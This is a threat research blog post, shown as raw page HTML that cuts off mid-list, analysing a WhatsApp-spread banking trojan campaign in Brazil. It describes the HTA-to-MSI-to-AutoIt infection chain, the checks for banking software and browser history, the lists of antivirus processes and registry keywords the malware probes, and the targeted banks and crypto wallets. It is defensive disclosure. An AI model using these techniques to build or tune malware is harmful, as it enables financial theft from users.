Unraveling Water Saci’s New Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp | Trend Micro (US)<\/title> <link href=\"https:\/\/fonts.googleapis.com\/css?family=Open+Sans:300,300i,400,400i,600\" rel=\"stylesheet\">\n<link href=\"\/\/customer.cludo.com\/css\/296\/1798\/cludo-search.min.css\" type=\"text\/css\" rel=\"stylesheet\"> <link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch.min.47ce60d92d94610907e7a2cbd6fbca69.css\" type=\"text\/css\">\n<link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendmicro\/clientlibs\/trendmicro-core-2\/clientlibs\/header-footer.min.73d48bc3ed70be81f869353a9360ab96.css\" type=\"text\/css\"> <meta property=\"og:url\" content=\"https:\/\/www.trendmicro.com\/en_us\/research\/25\/l\/water-saci.html\"><br \/>\n<meta property=\"og:title\" content=\"Unraveling Water Saci's New Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp\"><br \/>\n<meta property=\"og:description\" content=\"Through AI-driven code conversion and a layered infection chain involving different file formats and scripting languages, the threat actors behind Water Saci are quickly upgrading their malware delivery and propagation methods across WhatsApp in Brazil.\"><br \/>\n<meta property=\"og:site_name\" content=\"Trend Micro\"><br \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/WaterSaci_thumbnail.jpg\"><br \/>\n<meta property=\"og:locale\" content=\"en_US\"> <meta name=\"twitter:card\" content=\"summary_large_image\"><br \/>\n<meta name=\"twitter:site\" content=\"@TrendMicro\"><br \/>\n<meta name=\"twitter:title\" content=\"Unraveling Water Saci's New Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp\"><br \/>\n<meta name=\"twitter:description\" content=\"Through AI-driven code conversion and a layered infection chain involving different file formats and scripting languages, the threat actors behind Water Saci are quickly upgrading their malware delivery and propagation methods across WhatsApp in Brazil.\"><br \/>\n<meta name=\"twitter:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/WaterSaci_thumbnail.jpg\"> <meta name=\"user-country-code\" content=\"US\"> <\/head> <body class=\"articlepage page basicpage context-business\" id=\"readabilityBody\" readability=\"51.053520483853\">  <a id=\"page-scroll\" title=\"VerticalPageScroll\" href=\"javascript:jumpScroll($(this).scrollTop());\"> <span class=\"icon-chevron-up\"><\/span> <\/a>  <\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" data-article-pageid=\"1296840809\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"12\">\n<div class=\"article-details\" role=\"heading\" readability=\"44\"> <span class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__display-tag\">Phishing<\/p>\n<p class=\"article-details__description\">Through AI-driven code conversion and a layered infection chain involving different file formats and scripting languages, the threat actors behind Water Saci are quickly upgrading their malware delivery and propagation methods across WhatsApp in Brazil.<\/p>\n<p class=\"article-details__author-by\">By: Jeffrey Francis Bonaobra, Sarah Pearl Camiling, Joe Soares, Byron Gelera, Ian Kenefick, Emmanuel Panopio <time class=\"article-details__date\">Dec 02, 2025<\/time> <span>Read time: <\/span><span class=\"eta\"><\/span> (<span class=\"words\"><\/span> words) <\/p>\n<div class=\"article-details__icons\">  <\/p>\n<div class=\"a2a_kit a2a_default_style\" data-a2a-icon-color=\"#717172\"> <a class=\"a2a_dd addthis_link\" href=\"https:\/\/www.addtoany.com\/share\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch\/resources\/img\/share-more.svg\" class=\"svg-icon\" alt=\"Share\"> <\/a> <a class=\"a2a_button_print addthis_link\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch\/resources\/img\/printer.svg\" class=\"svg-icon\" alt=\"Print\"> <\/a> <\/div>\n<p>   <\/div>\n<\/div><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-lg-8 col-lg-push-2\"> <\/p>\n<div>\n<div class=\"richText\" readability=\"43.75554796859\">\n<div readability=\"34.032092864459\">\n<h2><span class=\"main-subtitle-black\"><span class=\"body-subhead-title\">Key takeaways<\/span><\/span><\/h2>\n<ul>\n<li><span class=\"rte-red-bullet\">The Water Saci campaign in Brazil has been observed using a highly layered attack chain that involves various file formats (including HTA files, ZIP archives, and PDFs), designed to bypass simple pattern-based detection and increase the complexity of analysis.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">The attackers switched tactics by transitioning from their PowerShell-based propagation routine to a Python variant, which suggests an accelerated development pipeline. This newly observed variant allows for broader browser compatibility, object-oriented code structure, enhanced error handling, and faster automation of malware delivery through WhatsApp Web.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Evidence suggests that attackers may have used AI tools like LLMs to convert their malware propagation scripts from PowerShell to Python; this would explain their capabilities for batch messaging, improved error handling, and enhanced console output.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Trend Vision One\u2122 detects and blocks the IoCs discussed in this blog. Trend Micro customers can also access tailored hunting queries, threat insights, and intelligence reports to better understand and proactively defend against this campaign.<\/span><\/li>\n<\/ul>\n<p>Brazil has seen a recent surge of threats delivered via WhatsApp. As observed in our previously published research on <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/25\/j\/self-propagating-malware-spreads-via-whatsapp.html\" target=\"_blank\">the SORVEPOTEL malware<\/a> and <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/25\/j\/active-water-saci-campaign-whatsapp-update.html\" target=\"_blank\">the broader Water Saci campaign<\/a>, this popular platform has been used to launch sophisticated campaigns. Unsuspecting users receive convincing messages from trusted contacts, often crafted to exploit social engineering tactics and encourage interaction with malicious content. While the core objectives of these campaigns remain consistent, this wave showcases advanced techniques in infection, persistence, and evasion, underscoring how legitimate platforms are increasingly being exploited to reach Brazilian targets more effectively.<\/p>\n<p>Their new multi-format attack chain and possible use of <a href=\"https:\/\/www.trendmicro.com\/en_us\/what-is\/ai.html\" target=\"_blank\">artificial intelligence (AI)<\/a> to convert propagation scripts from PowerShell to Python exemplifies a layered approach that has enabled Water Saci to bypass conventional security controls, exploit user trust across multiple channels, and ramp up their infection rates. As adversaries\u2019 techniques evolve, organizations must be prepared for the heightened risk posed by campaigns that combine technical complexity with AI-enhanced agility.<\/p>\n<h2><span class=\"body-subhead-title\">Multi-format malware delivery through WhatsApp messages<\/span><\/h2>\n<p>The initial stage of this campaign demonstrates a diverse set of entry points employed by threat actors to reach victims through WhatsApp. Users reported receiving messages from trusted contacts containing various forms of malicious attachments.<\/p>\n<p>Some users received compressed archive files, such as ZIP files containing harmful payloads (Figure 1). Others were targeted with messages encouraging them to download what appeared to be benign PDF documents, often accompanied by plausible lures like requests to update Adobe Reader for proper viewing (Figures 2 and 3).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci01.png\" alt=\"Figure 1. A WhatsApp message luring user to open the ZIP file\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 1. A WhatsApp message luring user to open the ZIP file<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci02.png\" alt=\"Figure 2. A WhatsApp message luring user to open the PDF file\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 2. A WhatsApp message luring user to open the PDF file<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci03.png\" alt=\"Figure 3. Blurred image luring the users to click\/update Adobe\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 3. Blurred image luring the users to click\/update Adobe<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p>A notable subset of victims was targeted with a direct delivery of a malicious .hta file. Unlike ZIP or PDF formats, the .hta file executes its embedded script immediately upon opening, streamlining the infection process for the attacker. One detail observed in multiple cases was the download of files with names following the pattern <i>A-{random characters}.hta<\/i> directly from <i>web.whatsapp[.]com<\/i> as shown in the Trend Vision One\u2122 telemetry logs in Figure 4.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci04.png\" alt=\"Figure 4. Malicious HTA file \"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 4. Malicious HTA file <\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\">\n<div>\n<p><span class=\"body-subhead-title\">Technical analysis<\/span><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci05.png\" alt=\"Figure 5. Attack chain\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 5. Attack chain<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"38.5\">\n<div readability=\"22\">\n<p><b>Initial vector – HTA file<\/b><\/p>\n<p>The infection chain begins when the user executes a malicious HTA file, which contains an embedded Visual Basic (VB) script that utilizes two layers of obfuscation to evade detection and hinder analysis. Once this script is deobfuscated, it reveals commands to create a batch file at <i>C:\\temp\\instalar.bat<\/i> and if executed, it initiates connecting to the attacker\u2019s command-and-control (C&C) server to download an MSI installer and an automation (Python) script along with its supporting components. <\/p>\n<p><b>Banking trojan – First stage<\/b><\/p>\n<p>Following execution of the batch file, the infection chain continues with the download and installation of the MSI package. This installer serves as the primary vehicle for delivering the banking trojan and initiating its malicious activities on the compromised system (Figure 6).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci06.png\" alt=\"Figure 6. MSI Installation leading to the banking trojan payload\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 6. MSI Installation leading to the banking trojan payload<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"37\">\n<div class=\"responsive-table-wrap\" readability=\"19\">\n<p>Upon inspection, the MSI package is found to contain several key components, described in more detail in Table 1:<\/p>\n<p><center><\/p>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\" width=\"624\">\n<tbody readability=\"3.5\">\n<tr>\n<td><b>File name<\/b><\/td>\n<td width=\"507\"><b>Description<\/b><\/td>\n<\/tr>\n<tr>\n<td>DaXGkoD7.exe<\/td>\n<td width=\"507\">AutoIt interpreter<\/td>\n<\/tr>\n<tr>\n<td>Ons7rxGC.log<\/td>\n<td width=\"507\">Compiled AutoIt script<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>run.vbs<\/td>\n<td width=\"507\">Initial launcher for AutoIt<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>starter.bat<\/td>\n<td width=\"507\">Batch file to launch AutoIt in a specified folder<\/td>\n<\/tr>\n<tr>\n<td>ucJDpQ.tda<\/td>\n<td width=\"507\">Encrypted PE payload<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td>fKmkzW.dmp<\/td>\n<td width=\"507\">Alternative encrypted PE payload (<i>If ucJDpQ.tda is missing, fKmkzW.dmp serves as the payload)<\/i><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><\/center><\/p>\n<p><span class=\"rte-icon-component-text\">Table 1. Files in the MSI package<\/span><\/p>\n<p>The installer leverages a custom action to execute the included VB script (<i>run.vbs<\/i>), as shown in Figure 7. The script launches the AutoIt interpreter (<i>DaXGkoD7.exe<\/i>) to run the compiled AutoIt script (<i>Ons7rxGC.log<\/i>), shown in Figure 8. This process ultimately leads to the unpacking and activation of the final banking trojan payload hidden within the package.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci07.png\" alt=\"Figure 7. The MSI installer initially executes the VB script using CustomAction\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 7. The MSI installer initially executes the VB script using CustomAction<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci08.png\" alt=\"Figure 8. The VB script initiates the AutoIt interpreter (DaXGkoD7.exe), which then runs the compiled AutoIt payload (ONs7rxGC.log)\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 8. The VB script initiates the AutoIt interpreter (DaXGkoD7.exe), which then runs the compiled AutoIt payload (ONs7rxGC.log)<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>The AutoIt script checks if it\u2019s being executed for the first time then notifies a remote server (Figure 9). If the marker file <i>executed.dat<\/i> does not exist, the function sends a notification to a specified URL and creates the marker file with a timestamp. This mechanism ensures that the notification is triggered only once during the first execution.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci09.png\" alt=\"Figure 9. AutoIt script initializing first-execution logic with remote notification\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 9. AutoIt script initializing first-execution logic with remote notification<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"35\">\n<div readability=\"15\">\n<p>On other AutoIt scripts we found from infection cases, the scripts start by checking the system language. As shown in Figure 10, it verifies if Windows is set to Portuguese (Brazil) by comparing its language code (0416). If not, it shows an error message with the detected language and exits the program. A helper function translates language codes into readable names like Portuguese (Portugal), English (US), or Spanish (Spain).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci10.png\" alt=\"Figure 10. Language verification routine ensuring Windows is set to Portuguese (Brazil)\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 10. Language verification routine ensuring Windows is set to Portuguese (Brazil)<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"36\">\n<div readability=\"17\">\n<p>The script then scans the user\u2019s system for banking-related activity (Figure 11), compiles the findings into a list, and sends the data to a C&C server. The first function, <i>DETECTARBANCO<\/i>, checks for the presence of specific directories associated with Brazilian banking applications (Table 2). If these folders exist, the script records the corresponding bank names, effectively fingerprinting which financial institutions the user interacts with. In Brazil, accessing most major banks requires security modules developed by independent companies as an attempt to protect end users from client-side fraud. Attackers know this and use it as a reliable method to guess the victim\u2019s primary bank.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci11.png\" alt=\"Figure 11. Checking for installed Brazilian banking applications\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 11. Checking for installed Brazilian banking applications<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\"> <center><\/p>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody readability=\"8\">\n<tr readability=\"2\">\n<td width=\"241\" valign=\"top\"><b>File path<\/b><\/td>\n<td width=\"382\" valign=\"top\"><b>Associated banking applications<\/b><\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"241\" valign=\"top\">C:\\Program Files (x86)\\scpbrad<\/td>\n<td width=\"382\" valign=\"top\">Bradesco banking software<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"241\" valign=\"top\">C:\\Program Files\\Warsaw<\/td>\n<td width=\"382\" valign=\"top\">Warsaw security module deployed by Banco do Brasil (BB) and Caixa Econ\u00f4mica Federal (CEF)<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"241\" valign=\"top\">C:\\Program Files\\Topaz OFD<\/td>\n<td width=\"382\" valign=\"top\">Topaz OFD anti-fraud module deployed by Banco do Brasil (BB) and Caixa Econ\u00f4mica Federal (CEF)<\/td>\n<\/tr>\n<tr>\n<td width=\"241\" valign=\"top\">C:\\Sicoobnet<\/td>\n<td width=\"382\" valign=\"top\">Sicoob banking software<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"241\" valign=\"top\">AppData\\Local\\Aplicativo Itau<\/td>\n<td width=\"382\" valign=\"top\">Ita\u00fa banking application<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span class=\"rte-icon-component-text\">Table 2. File paths associated with Brazilian banking applications<\/span><\/center> <\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"35\">\n<div readability=\"15\">\n<p>The second function, <i>VERIFICARHISTORICOCHROME()<\/i>, focuses on analyzing the user\u2019s Chrome browser history to identify visits to banking websites (Figure 12). It locates the Chrome history database within the user\u2019s profile directory, creates a temporary copy, and reads its contents. The function then searches for specific banking-related URLs (Table 3). If any of these URLs are found, the corresponding bank names are recorded. This technique allows the script to detect banking activity even if no banking software is installed on the system.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci12.png\" alt=\"Figure 12. Checking Chrome browser history for visited banking websites\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 12. Checking Chrome browser history for visited banking websites<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\">\n<div> <center><\/p>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody readability=\"3\">\n<tr>\n<td width=\"206\" valign=\"top\"><b>Targeted URLs<\/b><\/td>\n<td width=\"310\" valign=\"top\"><b>Associated bank<\/b><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"206\" valign=\"top\">www[.]santander[.]com[.]br<\/td>\n<td width=\"310\" valign=\"top\">Santander<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"206\" valign=\"top\">autoatendimento[.]bb[.]com[.]br<\/td>\n<td width=\"310\" valign=\"top\">Banco do Brasil<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"206\" valign=\"top\">internetbanking[.]caixa[.]gov[.]br<\/td>\n<td width=\"310\" valign=\"top\">Caixa Econ\u00f4mica Federal<\/td>\n<\/tr>\n<tr>\n<td width=\"206\" valign=\"top\">www[.]sicredi[.]com[.]br<\/td>\n<td width=\"310\" valign=\"top\">Sicredi<\/td>\n<\/tr>\n<tr>\n<td width=\"206\" valign=\"top\">banco[.]bradesco<\/td>\n<td width=\"310\" valign=\"top\">Bradesco<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Table 3. Specific banking-related URLs the second function searches for<\/center> <\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>After identifying installed banking applications and analyzing browser history, the script moves on to another critical reconnaissance step: checking for antivirus and security software. It inspects running processes for executables linked to the following security software:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">360sd.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">360tray.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">ashDisp.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">aswidsagent.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">avast.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">AvastSvc.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">AvastUI.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">avgnt.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">avgui.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">avguix.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">avp.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">avpui.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">bdagent.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">ccapp.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">ccSvcHst.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">cfp.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">cmdagent.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">egui.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">eguiProxy.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">ekrn.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">fshoster32.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">kavtray.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">klwtblfs.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">mbam.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">MBAMService.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">mbamtray.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">mcshield.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Mcshield.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">mcuicnt.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">MSASCui.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">MSASCuiL.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">MsMpEng.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">NisSrv.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">ns.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">PSUAMain.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">PSANHost.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">SAVADMINSERVICE.EXE<\/span><\/li>\n<li><span class=\"rte-red-bullet\">SAVService.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">seccenter.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">SecurityHealthSystray.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">SophosUI.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">vkise.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">vsserv.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">WRSA.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">zatray.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">ZAPrivacyService.exe<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p>The script also iterates through the Windows Uninstall registry keys, searching for the following keywords related to antivirus and security software:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">360<\/span><\/li>\n<li><span class=\"rte-red-bullet\">anti-virus<\/span><\/li>\n<li><span class=\"rte-red-bullet\">antivirus<\/span><\/li>\n<li><span class=\"rte-red-bullet\">avast<\/span><\/li>\n<li><span class=\"rte-red-bullet\">avg<\/span><\/li>\n<li><span class=\"rte-red-bullet\">bitdefender<\/span><\/li>\n<li><span class=\"rte-red-bullet\">comodo<\/span><\/li>\n<li><span class=\"rte-red-bullet\">defender<\/span><\/li>\n<li><span class=\"rte-red-bullet\">eset<\/span><\/li>\n<li><span class=\"rte-red-bullet\">f-secure<\/span><\/li>\n<li><span class=\"rte-red-bullet\">kaspersky<\/span><\/li>\n<li><span class=\"rte-red-bullet\">malwarebytes<\/span><\/li>\n<li><span class=\"rte-red-bullet\">mcafee<\/span><\/li>\n<li><span class=\"rte-red-bullet\">norton<\/span><\/li>\n<li><span class=\"rte-red-bullet\">panda<\/span><\/li>\n<li><span class=\"rte-red-bullet\">security<\/span><\/li>\n<li><span class=\"rte-red-bullet\">sophos<\/span><\/li>\n<li><span class=\"rte-red-bullet\">trend micro<\/span><\/li>\n<li><span class=\"rte-red-bullet\">webroot<\/span><\/li>\n<li><span class=\"rte-red-bullet\">zonealarm<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p>In addition to collecting details about installed banking applications, security software, and visiting banking websites, the script also gathers the following information, which is then sent to a remote C&C server:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Computer name<\/span><\/li>\n<li><span class=\"rte-red-bullet\">OS version, architecture and build number<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Username<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Local IP address<\/span><\/li>\n<li><span class=\"rte-red-bullet\">External IP address<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Current date and time<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Windows version<\/span><\/li>\n<li><span class=\"rte-red-bullet\">CPU model<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Total physical memory<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"37\">\n<div readability=\"19\">\n<p>The script monitors an array of keywords for Brazilian banks, payment platforms, and cryptocurrency exchanges\/wallets. It enumerates all open windows and then searches for keyword matches.<\/p>\n<p>Targeted entities include:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><b>Brazilian banks:<\/b><\/span>\n<ul>\n<li><span class=\"rte-circle-bullet\">Banco do Brasil<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">BMG<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Bradesco<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">BS2<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">BTG Pactual<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">CEF<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Ita\u00fa<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Santander<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Sicoob<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Sicredi<\/span><\/li>\n<\/ul>\n<\/li>\n<li><span class=\"rte-red-bullet\"><b>Payment platform:<\/b> <\/span>\n<ul>\n<li><span class=\"rte-circle-bullet\">Mercado Pago<\/span><\/li>\n<\/ul>\n<\/li>\n<li><span class=\"rte-red-bullet\"><b>International exchanges:<\/b><\/span>\n<ul>\n<li><span class=\"rte-circle-bullet\">Binance<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Bitfinex<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Bitstamp<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Bybit<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Coinbase<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Crypto.com<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Gate.io<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Huobi<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Kraken<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">KuCoin<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">OKX<\/span><\/li>\n<\/ul>\n<\/li>\n<li><span class=\"rte-red-bullet\"><b>Brazilian exchanges:<\/b><\/span>\n<ul>\n<li><span class=\"rte-circle-bullet\">Bitcoin Trade<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">BitPreco<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Braziliex<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">FlowBTC<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Foxbit<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Mercado Bitcoin<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">NovaDAX<\/span><\/li>\n<\/ul>\n<\/li>\n<li><span class=\"rte-red-bullet\"><b>Cryptocurrency wallets:<\/b><\/span>\n<ul>\n<li><span class=\"rte-circle-bullet\">Atomic Wallet<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Blockchain.com<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Coinomi<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Electrum<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Exodus<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Jaxx<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Ledger Live<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">MetaMask<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">MyCrypto<\/span><\/li>\n<li><span 